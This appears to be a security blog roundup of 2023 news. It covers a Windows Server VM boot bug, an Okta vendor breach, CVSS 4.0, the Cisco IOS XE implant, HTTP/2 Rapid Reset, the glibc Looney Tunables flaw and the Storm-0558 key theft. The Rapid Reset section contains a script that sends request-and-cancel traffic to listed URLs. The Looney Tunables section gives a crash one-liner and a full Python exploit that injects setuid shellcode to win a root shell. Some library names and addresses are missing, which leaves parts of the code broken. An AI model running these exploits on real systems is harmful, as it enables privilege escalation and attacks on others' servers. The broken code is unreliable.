
  • Microsoft Resolves Windows Server VM Issues Caused by October Updates

    Within the rapidly evolving realm of technology, even the most dependable systems can experience unforeseen malfunctions. Windows Server administrators recently encountered a bewildering problem after last month's cumulative update KB5031364: Windows Server 2022 virtual machines (VMs) running on VMware ESXi hosts hit blue screens and failed to boot because of an update that was meant to improve system operation.

    The Conundrum Unveiled

    Following installation of the cumulative update, administrators promptly reported problems with virtual machine initialization. The issue was limited to guest VMs on VMware ESXi hosts backed by an AMD EPYC physical processor, and it surfaced only when Virtualization-Based Security and System Guard Secure Launch were enabled in Windows Server 2022 together with the VMware option "Expose IOMMU to guest OS."

    Microsoft's Acknowledgment and Solution

    Microsoft formally acknowledged the issue a few days after it first surfaced. More importantly, it identified the affected configurations and shipped a remedy: this month's Patch Tuesday included cumulative update KB5032198 for Windows Server 2022, which addresses the root cause. "This update fixes a known problem that affects virtual machines (VMs) that run on VMware ESXi hosts," Microsoft said in a statement. While the problem existed, Windows Server 2022 would not boot, and affected VMs displayed a blue screen with the stop code: PNP DETECTED FATAL ERROR.

    Temporary Workarounds

    Acknowledging that not all administrators can deploy the update immediately, Microsoft also offered temporary fixes. One option is to disable the "Expose IOMMU to guest OS" setting in the affected virtual machine configurations.
    However, because some environments require this option to be enabled, this workaround may be applicable only to a subset of machines. Administrators experiencing VM boot failures can, as a last resort, remove the KB5031364 update. Although this fixes the boot issues, there is a big catch: it also removes all security fixes that shipped with the update.

    Historical Context

    Microsoft has run into problems caused by cumulative updates before. The company published out-of-band Windows Server updates in January and December 2022 to address issues that prevented Hyper-V virtual machines (VMs) from launching and caused failures when creating new VMs on hosts. When a similar problem affecting VMware ESXi virtual machines with Secure Boot enabled was identified earlier in the year, VMware and Microsoft responded quickly.

    Addressing Community Concerns

    Community feedback has raised concerns about the accuracy of the information provided. Some readers point out inconsistencies within the page, questioning whether the provided links truly capture the breadth of the problem. Concerns have also been raised that the issue affects Hyper-V on Windows Server 2019 and Intel processors in addition to AMD processors. Such reports are worth noting, as they attempt to illustrate different scenarios of virtual machines failing to start after the October updates were applied. Microsoft acknowledged and fixed the issue for one specific combination of hardware and settings, which suggests either that the cause of the boot problems varies among platforms or that Microsoft was unable to verify the issue for the other affected setups.

    Conclusion

    Problems will inevitably come up in the dynamic world of virtual environments and software updates. Microsoft's quick fix for the Windows Server 2022 virtual machine issue shows its commitment to finding solutions quickly. Administrators must keep up with the updates and temporary workarounds offered by the tech giant as they navigate these troubleshooting waters.

  • Security Incident Involving Third-Party Vendor Compromises Okta Employee Health Information

    An alarming security breach at Rightway Healthcare, a third-party service provider, has compromised the personal health information (PHI) of approximately 5,000 Okta personnel. This incident represents the latest challenge for the identity and access management (IAM) leader in a series of recent security setbacks.

    Detailed Analysis

    - The breach report indicates that a sophisticated cyber intrusion at Rightway Healthcare, which provides services to Okta, led to the unauthorized disclosure of PHI belonging to Okta's current and former employees. Data breach notifications were officially filed in California and Maine.
    - Okta has clarified that its core services remain intact and secure, emphasizing that customer data has not been affected by this breach. Distinguishing breaches of Okta's own services from breaches at third parties is critical to understanding the scope and impact.
    - The threat actors reportedly accessed a file containing employee names, Social Security numbers, and health insurance details on September 23, per Rightway's disclosure to Okta on October 12. Rightway had not responded to requests for additional information at the time of reporting.

    Insights

    Okta's recent history has been marred by security incidents since late July, with this third-party breach serving as a stark reminder of the continuous and complex nature of third-party risk management. Industry experts have weighed in on the significance of this breach, highlighting the critical need for rigorous security protocols and risk mitigation strategies, particularly for sensitive data handled by third-party vendors.

    Recent Events Timeline

    - Okta experienced a security event in which unauthorized access was gained to its support system using compromised administrative credentials. This led to attacks on several Okta customers, raising concerns about systemic security practices.
    - The company has been proactive in addressing the breach by revoking potentially compromised session tokens and enhancing internal security measures.
    - Okta's disclosure of the incident fell within regulatory timeframes, but the complex process of record analysis and deduplication delayed immediate notification.

    Market Impact

    - Okta saw a significant decrease in market capitalization following public disclosure of the breach, indicative of how seriously the market treats security incidents involving high-profile companies.
    - As a critical player in the cybersecurity infrastructure of many corporations, Okta's security incidents have far-reaching implications, particularly given the expansive customer base that relies on its services for streamlined identity management across various platforms.

    References for further details

    1) Okta's official statement on the unauthorized access incident and subsequent remedial actions: "Unauthorized Access to Okta's Support Case Management System: Root Cause and Remediation"
    2) Okta's documentation on generating HAR files for troubleshooting: "Generate HAR Files"
    3) The official report filed with the Office of the Maine Attorney General, accessible on its website
    4) A detailed account of the tracking efforts for the unauthorized access to Okta's support system: "Tracking Unauthorized Access to Okta's Support System"
    5) CNBC's report on the market response: "Okta shares fall 11% after company says client files were accessed by hackers via its support system"

  • CVSS 4.0: The Evolution from CVSS v1 to CVSS 4.0

    The Common Vulnerability Scoring System (CVSS) is a widely used framework for evaluating the severity of vulnerabilities in computer systems and software. It gives organizations a standardized method for prioritizing and addressing security vulnerabilities according to their potential impact. CVSS has undergone numerous updates and enhancements over the years to better reflect the evolving threat landscape and provide more precise vulnerability ratings. This article examines the distinctions between CVSS v1 and the most recent version, CVSS 4.0.

    CVSS v1: The Foundation

    CVSS v1, introduced in 2005, served as the foundation for subsequent versions. It provided a basic framework for evaluating vulnerabilities, but it had notable limitations. The most significant shortcoming was its lack of granularity: it relied on a small number of metrics, making it difficult to distinguish accurately between different types and severity levels of vulnerabilities. CVSS v1 also failed to account for temporal factors, such as the availability of exploits or the state of remediation, both of which are crucial in determining the true risk a vulnerability poses.

    CVSS v3: A Comprehensive Approach

    CVSS v3, released in 2015, introduced significant enhancements to address the deficiencies of its predecessors. It aimed to provide a more thorough and precise evaluation of vulnerabilities by incorporating additional metrics and temporal factors. One of its notable changes is the refinement of the Base, Temporal, and Environmental metric groups. These groups enable a more thorough evaluation of vulnerabilities by considering factors such as the impact on the confidentiality, integrity, and availability of the affected system, as well as its exploitability and level of remediation.
    CVSS v3 retained the 0-to-10 scoring range but paired it with a qualitative severity scale (None, Low, Medium, High, Critical), which makes vulnerability ratings easier to interpret and facilitates more accurate comparison and ranking of security issues. A further significant enhancement in CVSS v3 is its set of exploitability metrics, which consider attack vector, attack complexity, and required privileges to give a more accurate estimate of the likelihood of exploitation. CVSS v3 also captures temporal factors through its Temporal metric group, which covers exploit code maturity, remediation level, and report confidence, allowing organizations to assess the actual risk posed by a vulnerability at a given time.

    CVSS 4.0: The Next Level

    CVSS 4.0, the latest version of the framework, was still being finalized at the time of writing. Its primary objective is to improve the precision and usability of CVSS by addressing limitations identified in CVSS v3. One important enhancement is the increased granularity of the Base metric group: among other refinements, CVSS 4.0 splits User Interaction into finer levels (None, Passive, Active) and adds a new Attack Requirements metric alongside Attack Complexity. CVSS 4.0 also rethinks v3's Scope metric, replacing it with separate impact assessments for the vulnerable system and for subsequent systems in its surroundings; this helps organizations prioritize their responses with a clearer understanding of a vulnerability's potential downstream repercussions. Finally, CVSS 4.0 aims to make scoring clearer and more consistent by sharpening the definitions of the metrics and their values, making it easier to analyze and compare vulnerability ratings from different sources.
In conclusion, CVSS has evolved significantly from its initial version, CVSS v1, to the current version, CVSS 4.0. The introduction of additional metrics, consideration of temporal factors, and increased granularity have made CVSS a more comprehensive and accurate framework for assessing vulnerabilities. As the threat landscape continues to evolve, it is crucial for organizations to stay updated with the latest version of CVSS to effectively prioritize and address security vulnerabilities.
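    To make the metric groups above concrete, here is a minimal sketch of the CVSS v3.1 base-score arithmetic for the scope-unchanged case. The constants come from the FIRST v3.1 specification; the v4.0 equations differ, and this omits the scope-changed branch and the Temporal/Environmental adjustments.

```python
import math

# CVSS v3.1 metric weights (FIRST specification), scope-unchanged case.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}   # Attack Vector
AC = {"L": 0.77, "H": 0.44}                         # Attack Complexity
PR = {"N": 0.85, "L": 0.62, "H": 0.27}              # Privileges Required
UI = {"N": 0.85, "R": 0.62}                         # User Interaction
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}              # C / I / A impact

def roundup(x):
    # CVSS "round up to one decimal" helper, per the v3.1 spec appendix.
    return math.ceil(round(x * 10, 5)) / 10

def base_score(av, ac, pr, ui, c, i, a):
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))

# CVE-2023-44487 (HTTP/2 Rapid Reset): AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
print(base_score("N", "L", "N", "N", "N", "N", "H"))  # 7.5
```

    Running the same function on a network-exploitable, no-privileges, full-impact vector (C:H/I:H/A:H) yields 9.8, the familiar "Critical" rating for many remote code execution flaws.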

  • Infection of over 40,000 Cisco IOS XE devices with a zero-day backdoor

    Over 40,000 Cisco devices running the IOS XE operating system have been compromised by hackers exploiting a newly found maximum-severity vulnerability tracked as CVE-2023-20198. Because no patch or workaround is currently available, customers are recommended to "deactivate the HTTP Server feature on all internet-facing systems" to secure their devices. The Cisco IOS XE networking operating system runs on enterprise switches, industrial routers, access points, wireless controllers, and aggregation and branch routers.

    Tens of thousands of Cisco devices compromised

    Around 10,000 Cisco IOS XE devices were initially thought to have been compromised, but the number climbed as security researchers scanned the internet for a more accurate count. On Tuesday, October 17, LeakIX, an indexing service for web apps and services that are publicly reachable, reported discovering about 30,000 affected devices, excluding rebooted systems. The search used Cisco's indicators of compromise (IoCs) to assess whether CVE-2023-20198 had already been successfully exploited on an exposed device, and it turned up thousands of affected hosts in Chile, the Philippines, and the United States.

    LeakIX results for Cisco IOS XE devices exposed online (LeakIX)

    Orange's private CERT reported on Wednesday, October 18, 2023, that more than 34,500 Cisco IOS XE IP addresses carried malicious implants resulting from exploitation of CVE-2023-20198; this information was confirmed using the same verification method Cisco employs. CERT Orange also provided a Python script to test for the presence of a malicious implant on a network device running Cisco IOS XE. The Censys search platform, which maps the attack surface of internet-connected devices, reported on October 18 that the count of compromised devices had risen to 41,983.
    Censys results for Cisco IOS XE hosts on the open web (Censys)

    It is difficult to determine the exact number of Cisco IOS XE devices reachable from the open internet, but Shodan shows slightly more than 145,000 hosts, the majority of them in the United States. Security researcher Yutaka Sejiyama found nearly 90,000 hosts exposed on the internet when he searched Shodan for Cisco IOS XE devices vulnerable to CVE-2023-20198. Many of the devices in the country belong to communications service providers, including Google Fiber, Comcast, Verizon, Cox Communications, Frontier, AT&T, Sprint, CenturyLink, and Charter. Sejiyama's list also includes government agencies, banks, hospitals, medical facilities, universities, sheriff's offices, school districts, and convenience stores.

    After device reboot, the risk remains

    Although threat actors had been using CVE-2023-20198 as a zero-day since before September 28 to set up high-privilege accounts on vulnerable hosts and take complete control of the devices, Cisco only publicly disclosed it on Monday, October 16, 2023. On October 17, 2023, Cisco added new attacker IP addresses and usernames to its advisory, along with updated rules for Snort, an open-source network intrusion detection and prevention system. Researchers noted that the threat actors behind these attacks are deploying a non-persistent malicious implant that is removed by a device reboot. However, the new accounts it helped create survive the reboot and "have level 15 privileges, meaning they have full administrator access to the device." According to Cisco's analysis, the threat actor gathers information about the device and conducts initial reconnaissance. The attacker is also deleting users and clearing logs, most likely to conceal the activity.
Although they were unable to identify the initial delivery method, the researchers believe that only one threat actor is responsible for these attacks. Cisco has not provided any further information regarding the attacks, but it has promised to do so once the investigation is over and a fix is available.
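    Cisco's published guidance included a simple liveness check for the implant: send a POST request to /webui/logoutconfirm.html?logon_hash=1 on the device and see whether the response body is a bare hexadecimal string (reported as 18 characters) rather than a normal web page. A hedged sketch of that response check in Python follows; the endpoint and response format are taken from Cisco's guidance, so verify them against the current advisory before relying on this.

```python
import re

def looks_like_implant_response(body: str) -> bool:
    """Return True if `body` matches the implant's reported reply: a bare
    18-character lowercase hexadecimal string and nothing else."""
    return bool(re.fullmatch(r"[0-9a-f]{18}", body.strip()))

# Hypothetical usage against a lab device (device_ip is an assumption,
# and the self-signed Web UI certificate forces verify=False):
# import requests
# r ="https://{device_ip}/webui/logoutconfirm.html?logon_hash=1",
#                   verify=False, timeout=5)
# print(looks_like_implant_response(r.text))
```

    Scanning devices you do not own or administer is, of course, out of scope; this is intended for checking your own fleet.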

  • Unprecedented DDoS Attacks Launched Using HTTP/2 Rapid Reset Zero-Day Flaw

    On Tuesday, leading tech giants Amazon Web Services (AWS), Cloudflare, and Google announced that they had successfully thwarted unprecedented distributed denial-of-service (DDoS) attacks using a new method dubbed "HTTP/2 Rapid Reset". First identified in late August 2023, these Layer 7 attacks have been logged as CVE-2023-44487, which carries a CVSS score of 7.5 out of 10. Attacks targeting Google's infrastructure peaked at 398 million requests per second (RPS), while AWS and Cloudflare saw attacks peak at 155 million and 201 million RPS respectively.

    The term "HTTP/2 Rapid Reset" refers to a zero-day vulnerability in the HTTP/2 protocol that enables DDoS attacks. Central to the issue is the protocol's ability to multiplex requests over a single TCP connection, yielding concurrent streams, combined with the client's ability to prematurely terminate a request using an RST_STREAM frame. In the Rapid Reset attack, attackers rapidly send and cancel requests, bypassing the server's concurrent-stream limit and overburdening it without ever hitting the configured threshold. Simply put, attackers can initiate and swiftly terminate numerous HTTP/2 streams over a sustained connection, thereby overwhelming websites. Notably, Cloudflare observed that such attacks can be executed with a relatively small botnet of around 20,000 machines.

    Grant Bourzikas, Cloudflare's Chief Security Officer, commented, "This zero-day granted malefactors a potent addition to their arsenal, allowing attacks of unparalleled magnitude." While HTTP/2 is employed by 35.6% of all websites (W3Techs), 77% of requests utilize HTTP/2, according to Web Almanac. Google Cloud has identified several variants of the Rapid Reset attacks, some even more efficient than standard HTTP/2 DDoS attacks. The protocol's "request cancellation" feature was intended to make connections more efficient.
    However, since late August, ill-intentioned parties have exploited this feature to inundate servers with HTTP/2 requests and resets, rendering them incapable of processing new requests. Google shed light on the issue, explaining that the protocol does not require the client and server to coordinate a cancellation: the client can abort a stream unilaterally.

    HTTP/2 Rapid Reset logic overview (Google)

    Cloudflare highlighted that HTTP/2 proxies and load balancers are particularly vulnerable to rapid reset requests. Its network was mainly strained at the junction between the TLS proxy and its upstream counterpart, and consequently an uptick in 502 error reports was observed among Cloudflare's clientele.

    Requests stream diagram (Cloudflare)

    To counter these threats, Cloudflare employed an 'IP Jail' system tailored to manage high-volume attacks. This approach bars malicious IPs from using HTTP/2 on any Cloudflare domain for a specific duration, with legitimate users on the same IP experiencing only a minor performance dip. Amazon confirmed that it successfully neutralized numerous such attacks, emphasizing that customer service availability remained unaffected throughout.

    Attacks mitigated by Amazon in September 2023 (AWS)

    All three tech behemoths advocate a holistic approach to countering these threats, emphasizing the use of all available HTTP-flood protection tools and the strengthening of DDoS defense strategies. Notably, because attackers exploit an intrinsic aspect of the HTTP/2 protocol, a comprehensive fix that entirely thwarts this DDoS technique remains elusive.
    Proof of Concept Code to Check Vulnerability (CVE-2023-44487)

```python
"""
Proof of Concept Code to Check Vulnerability (CVE-2023-44487)
Developer: Aegisbyte
Date Released: October 10, 2023
"""
import argparse
import csv
import socket
import ssl
from datetime import datetime
from http.client import HTTPConnection, HTTPSConnection
from urllib.parse import urlparse

import httpx
from h2.config import H2Configuration
from h2.connection import H2Connection


class IPAddress:
    PREFIX = "192.168.1."
    IPs = [PREFIX + str(i) for i in range(1, 255)]

    @classmethod
    def retrieve_ips(cls, proxy_detail):
        # Best-effort discovery of the local IP via a throwaway UDP socket
        # (no packets are actually sent).
        selected_ip = cls.IPs[0]
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as conn_socket:
            conn_socket.settimeout(2)
            try:
                conn_socket.connect(("", 1))
                local_ip = conn_socket.getsockname()[0]
            except OSError:
                local_ip = ""
        return local_ip, selected_ip


def http2_status(target_url, proxy_detail):
    # Returns (1, "") if the server negotiates HTTP/2, (0, version) if it
    # falls back to another version, and (-1, error) on failure.
    params = {"http2": True, "verify": False}
    if proxy_detail:
        params["proxies"] = {
            "http://": proxy_detail["http"],
            "https://": proxy_detail["https"],
        }
    try:
        with httpx.Client(**params) as client:
            response = client.get(target_url)
            if response.http_version == "HTTP/2":
                return 1, ""
            return 0, response.http_version
    except Exception as e:
        return -1, str(e)


def reset_stream_action(host, port, stream_id, route="/", timeout_val=5, proxy_addr=None):
    # Opens a raw connection, sends HEADERS for one stream, then answers the
    # first event on that stream with RST_STREAM: the request/cancel pattern
    # at the heart of Rapid Reset.
    ssl_params = ssl.create_default_context()
    ssl_params.check_hostname = False
    ssl_params.verify_mode = ssl.CERT_NONE
    connection = (HTTPSConnection(host, port, timeout=timeout_val, context=ssl_params)
                  if port == 443 else HTTPConnection(host, port, timeout=timeout_val))
    try:
        connection.connect()
        h2_conn = H2Connection(config=H2Configuration(client_side=True))
        h2_conn.initiate_connection()
        connection.send(h2_conn.data_to_send())
        headers = [(":method", "GET"), (":authority", host),
                   (":scheme", "https"), (":path", route)]
        h2_conn.send_headers(stream_id, headers)
        connection.send(h2_conn.data_to_send())
        while True:
            chunk = connection.sock.recv(65535)
            if not chunk:
                break
            for evt in h2_conn.receive_data(chunk):
                if getattr(evt, "stream_id", None) == stream_id:
                    h2_conn.reset_stream(evt.stream_id)
                    connection.send(h2_conn.data_to_send())
                    return 1, ""
        return 0, "No response"
    except Exception as e:
        return -1, str(e)
    finally:
        connection.close()


def extract_url_data(url):
    parts = urlparse(url)
    return (parts.hostname,
            parts.port or (443 if parts.scheme == "https" else 80),
            parts.path or "/")


def main():
    parser = argparse.ArgumentParser(description="Check HTTP/2 support and potential vulnerabilities.")
    parser.add_argument("-i", "--input_file", required=True, help="Input file containing list of URLs.")
    parser.add_argument("-o", "--output_file", required=True, help="Output file for results.")
    parser.add_argument("--proxy_addr", help="HTTP/HTTPS proxy URL", default=None)
    args = parser.parse_args()

    proxy_data = {"http": args.proxy_addr, "https": args.proxy_addr} if args.proxy_addr else {}
    local_ip, test_ip = IPAddress.retrieve_ips(proxy_data)
    try:
        with open(args.input_file, "r") as in_file, \
             open(args.output_file, "w", newline="") as out_file:
            csv_writer = csv.writer(out_file)
            csv_writer.writerow(["Timestamp", "Local IP", "Test IP", "URL", "Status", "Details"])
            for line in in_file:
                web_address = line.strip()
                if not web_address:
                    continue
                time_now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
                support_status, err_msg = http2_status(web_address, proxy_data)
                domain, port_num, path = extract_url_data(web_address)
                if support_status == 1:
                    result, err_detail = reset_stream_action(domain, port_num, 1, path,
                                                             proxy_addr=args.proxy_addr)
                    if result == 1:
                        csv_writer.writerow([time_now, local_ip, test_ip, web_address, "VULNERABLE", ""])
                    else:
                        csv_writer.writerow([time_now, local_ip, test_ip, web_address, "POSSIBLE",
                                             f"Error in reset: {err_detail}"])
                elif support_status == 0:
                    csv_writer.writerow([time_now, local_ip, test_ip, web_address, "NOT SUPPORTED", err_msg])
                else:
                    csv_writer.writerow([time_now, local_ip, test_ip, web_address, "ERROR", err_msg])
        print(f"Results successfully written to: {args.output_file}")
    except FileNotFoundError:
        print(f"Error: The input file {args.input_file} was not found.")
    except Exception as e:
        print(f"An unexpected error occurred: {e}")


if __name__ == "__main__":
    main()
```

  • Looney Tunables: In-depth Analysis of Local Privilege Escalation

    Executive Summary

    The GNU C Library's dynamic loader,, is responsible for locating and initializing shared libraries required by an executable. This component is particularly critical because it is invoked with elevated privileges when executing certain binaries, such as set-user-ID and set-group-ID programs. Historically, the loader's handling of certain environment variables, notably LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH, has presented security risks.

    Qualys has identified a buffer overflow vulnerability in the dynamic loader's processing of the GLIBC_TUNABLES environment variable. The flaw was introduced in glibc 2.34 with the commit labeled 2ed18c in April 2021. Its impact is substantial, permitting escalation to root privileges on several mainstream distributions. Qualys is refraining from publishing the specific exploitation technique at this time. Nevertheless, given the simplicity of the buffer overflow, other security researchers may develop and release their own exploits soon after this advisory.

    Detailed Analysis

    At initialization, invokes the __tunables_init() function to scan the environment for GLIBC_TUNABLES variables. Upon detection, it duplicates the variable, processes and sanitizes the copy, and then replaces the original GLIBC_TUNABLES with the sanitized version. During sanitization, the parse_tunables function removes potentially harmful tunables while retaining safe ones. However, when it encounters a malformed GLIBC_TUNABLES variable (e.g., "tunable1=tunable2=AAA"), a buffer overflow can occur, corrupting adjacent memory. Qualys' follow-up investigations with fuzzing tools such as AFL++ and libFuzzer identified the vulnerability quickly, underscoring how easy it is to detect.
    Proof of Concept (CVE-2023-4911)

    Executing the command:

```shell
$ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
```

    Note: On vulnerable systems, the command results in a segmentation fault, confirming the vulnerability.

    Exploit in Python (the C exploit converted to Python; filenames stripped from the original listing have been reconstructed and are marked in the comments):

```python
#!/usr/bin/env python3
# PoC by Aegisbyte; credits to Qualys, Inc.
# Requires pwntools, a CTF framework and exploit development library
# written in Python and designed for rapid prototyping.
import ctypes
import os
import time

from pwn import *

context.os = "linux"
context.arch = "amd64"

FILL_SIZE = 0xd00
BOF_SIZE = 0x600

# Build a patched copy of in which __libc_start_main is replaced
# with shellcode that sets uid/gid to 0 and spawns a shell. The library
# path assumes a Debian-style multiarch layout (reconstructed filename).
libc = ELF("/lib/x86_64-linux-gnu/")
d = bytearray(open(libc.path, "rb").read())
sc = asm(shellcraft.setuid(0) + shellcraft.setgid(0) + shellcraft.sh())
orig =["__libc_start_main"], 0x10)
idx = d.find(orig)
d[idx : idx + len(sc)] = sc
open("./", "wb").write(d)


def time_us():
    return int(time.time() * 1e6)


def execve_raw(argv, envp):
    # os.execve() only accepts a dict for the environment, but this exploit
    # needs byte-exact control over the envp[] layout, so call execve(2)
    # directly through ctypes.
    libc_rt = ctypes.CDLL(None, use_errno=True)
    c_argv = (ctypes.c_char_p * (len(argv) + 1))(*argv, None)
    c_envp = (ctypes.c_char_p * (len(envp) + 1))(*envp, None)
    libc_rt.execve(argv[0], c_argv, c_envp)


# Environment layout: a filler tunable, the malformed key=key=value tunable
# that triggers the overflow, and a spray of fake l_info[DT_RPATH] entries.
filler = ("GLIBC_TUNABLES=glibc.malloc.mxfast=" + "F" * (FILL_SIZE - 34)).encode()
kv = ("GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=" + "A" * (BOF_SIZE - 49)).encode()
filler2 = ("GLIBC_TUNABLES=glibc.malloc.mxfast=" + "F" * (BOF_SIZE + 0x20 - 34)).encode()
dt_rpath = b"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xEC" * (0x20000 // 8)

envp = [b""] * 0x1000
envp[0] = filler
envp[1] = kv
envp[0x65] = b""
envp[0x65 + 0xb8] = b"\x30\xf0\xff\xff\xfd\x7f"  # guessed stack address
envp[0xf7f] = filler2
for i in range(0x2f):
    envp[0xf80 + i] = dt_rpath
envp[0xffe] = b"AAAA"

argv = [b"/usr/bin/su", b"--help"]

# Drop the patched library into a directory named '"' so that the corrupted
# DT_RPATH makes load it instead of the real one.
if not os.path.exists('"'):
    os.mkdir('"')
with open('"/', "wb") as dfd, open("./", "rb") as sfd:
    buf =
    while buf:
        dfd.write(buf)
        buf =

ct = 1
while True:
    if ct % 100 == 0:
        print(f"try {ct}")
    start_time = time_us()
    pid = os.fork()
    if pid == 0:  # child: one exploitation attempt
        execve_raw(argv, envp)
        os._exit(1)
    _, wstatus = os.wait()
    # A crash (SIGSEGV) means the address guess was wrong; a child that
    # exited normally after running for more than a second was likely an
    # interactive root shell that the user just exited.
    if not os.WIFSIGNALED(wstatus) and time_us() - start_time > 1_000_000:
        break
    ct += 1
```

    Note: Test this only in a safe, isolated environment, as it creates and runs a patched system library.

    Exploitation Mechanics

    The buffer overflow originates from memory allocations made by the __minimal_malloc function, which acquires memory via mmap(). Qualys explored several avenues for exploiting the vulnerability. The initial approach, overwriting the link_map structure's l_next and l_prev pointers, was thwarted by assertions within the loader. The successful approach instead targeted uninitialized pointers within the link_map structure, particularly l_info[DT_RPATH]. By manipulating this pointer, Qualys demonstrated that could be directed to load a trusted library from a malicious directory, facilitating arbitrary code execution. The exploit's effectiveness hinges on the guessability of memory addresses; with persistence and repeated attempts, the technique hijacks the library loading mechanism and achieves root privileges in most scenarios.

  • Regular Cloud Penetration Testing: The Crucial Aspect to Combat Evolving Threats

    Table of contents

    - Introduction
    - Understanding Cloud Penetration Testing
    - Benefits of Regular Cloud Penetration Testing
    - Key Aspects of an Effective Regular Cloud Penetration Testing Plan
    - Choosing the Right Cloud Penetration Testing Vendor
    - Conclusion

    Introduction

    Welcome to the world of cloud penetration testing! In today’s digital era, where every organization is moving to the cloud, it is crucial to ensure their data is secure. The answer is to have a robust cloud penetration testing plan in place.

    Cloud Penetration Testing

    Cloud penetration testing is a type of security testing that checks a cloud system for vulnerabilities by attempting to exploit them. It is a simulated attack that enables security experts to identify possible entry points that hackers could use to access sensitive data.

    Why is it Important?

    Cloud penetration testing is crucial because it detects security flaws in the cloud before hackers can exploit them. The benefits of a well-formulated cloud penetration testing plan include maintaining the integrity and confidentiality of data, avoiding the financial losses associated with data breaches, and, above all, protecting an organization’s reputation.

    Recent Security Breaches

    There have been instances where significant data breaches caused serious harm to companies that depended on the cloud. Many of these breaches could have been prevented with adequate cloud penetration testing measures in place. Stay ahead of the curve by signing up for cloud penetration testing services.

    Understanding Cloud Penetration Testing

    Cloud penetration testing is an exhaustive process of testing cloud environments to identify vulnerabilities and confirm the effectiveness of security controls. It aims to discover potential weaknesses in cloud infrastructure, applications, and data storage that attackers could exploit.
    Conducting regular testing helps you evaluate the resilience of your cloud environment against cyber-attacks. There are different types of cloud penetration testing, including black box, gray box, and white box testing, which vary based on the level of information provided to the tester. Cloud penetration testing also has its challenges: new threats emerge daily, making it necessary to continuously update security tools and techniques, and testing cloud applications and systems requires specialized knowledge and skills.

    The process of cloud penetration testing typically proceeds through information gathering and reconnaissance, scanning and enumeration, gaining access, and escalating privileges. Once potential vulnerabilities and weaknesses are identified, testers provide a detailed report outlining prioritized remediation steps the organization can take to improve its security posture.

    Overall, regular cloud penetration testing plays a vital role in identifying potential vulnerabilities in the cloud environment before attackers can exploit them. It helps organizations strengthen their security measures and ensure compliance with regulations and standards.

    Benefits of Regular Cloud Penetration Testing

    Regular cloud penetration testing provides several benefits in safeguarding your IT infrastructure from evolving cyber threats. It helps prevent data loss and leakage by identifying vulnerabilities in your security framework, and it provides robust protection against cyberattacks by surfacing weaknesses before malicious actors can exploit them. Regular testing allows you to stay ahead of potential cyber threats and avoid the cost of significant data breaches. Moreover, complying with regulations and standards such as HIPAA, PCI-DSS, and GDPR becomes much easier with regular cloud penetration testing in place.
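    As a toy illustration of the scanning-and-enumeration phase mentioned in the testing process above, here is a minimal TCP connect scan in Python. This is a sketch only: real engagements use authorized, purpose-built tooling (e.g. nmap) and must stay within the agreed scope.

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Example: scan a few common service ports on a host you are authorized to test
# print(scan_ports("", [22, 80, 443, 8080]))
```

    In a cloud context, the same idea is applied only to in-scope, customer-controlled endpoints, since scanning provider-owned infrastructure usually violates the provider's penetration testing policy.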
By partnering with the right vendor, you can ensure your organization's data is protected against known and unknown threats.

Key Aspects of an Effective Regular Cloud Penetration Testing Plan

The success of cloud penetration testing heavily relies on the plan's key aspects. Consider the following factors to create an effective plan:

- Scope definition: Determine which assets need to be tested and identify the scope and limits of the test. Factors such as network and device accessibility, permissions, and user roles should be considered.
- Testing frequency: Schedule regular cloud penetration tests periodically, with timing based on risk, infrastructure stability, and new technology integration. This ensures any new vulnerabilities or threats are detected early.
- Selection of testing techniques: Select appropriate testing tools and techniques depending on the scope, time, and budget of the test. These may include application, network, and physical-layer penetration testing, social engineering, and vulnerability assessment.
- Reporting and remediation: Report test results and identified vulnerabilities clearly and concisely, so the organization can take the necessary steps to fix vulnerabilities and reduce risk.
- Communication with stakeholders: Communicate the test's results and findings to stakeholders so they understand the testing process, the risks, and the steps being taken to address them.

An organization should also weigh these factors when selecting a cloud penetration testing provider. As always, prevention is better than cure, so strive to keep your system at the top of its game.

Choosing the Right Cloud Penetration Testing Vendor

Choosing the right cloud penetration testing vendor is crucial. Factors to consider include experience, expertise, and cost.
Ask the right questions, such as how they handle reporting and remediation, and whether they use automated tools. Consider in-house options, but don't overlook the value of outsourcing to experts.

Conclusion

Regular cloud penetration testing is essential to safeguard against evolving cyber threats. It helps identify vulnerabilities before it's too late, supports compliance with regulations and standards, and prevents data loss and cyberattacks. Don't compromise on security: contact us for our comprehensive Cloud Penetration Testing services today.

  • Microsoft explains how a crash dump led to a major security breach in Outlook

On Wednesday, 6 September, Microsoft disclosed that a China-based threat actor known as Storm-0558 obtained the inactive consumer signing key it used to forge tokens and access Outlook by compromising an engineer's corporate account. That compromise gave the adversary access to a debugging environment containing a snapshot of a crashed consumer signing system, from which the key was stolen. The crash itself occurred in April 2021.

The Microsoft Security Response Center (MSRC) stated in a post-mortem report that "a consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process ('crash dump')." Crash dumps are supposed to redact sensitive information and should not include the signing key; in this instance, a race condition allowed the key to be present in the crash dump, and Microsoft's systems failed to detect the key material in it.

Microsoft stated that the crash dump was later moved to a debugging environment on the internet-connected corporate network, and it is from this location that Storm-0558 is suspected to have obtained the key after breaking into the engineer's corporate account. Because of Microsoft's log retention policies, it is unknown whether this was the precise mechanism the threat actor used; Microsoft has stated that it does not have logs offering concrete proof of the exfiltration.

Microsoft's report also references spear-phishing and token-stealing malware, but it does not detail how the engineer's account was compromised in the first place, whether other corporate accounts were hacked, or when the company realized its security had been breached.
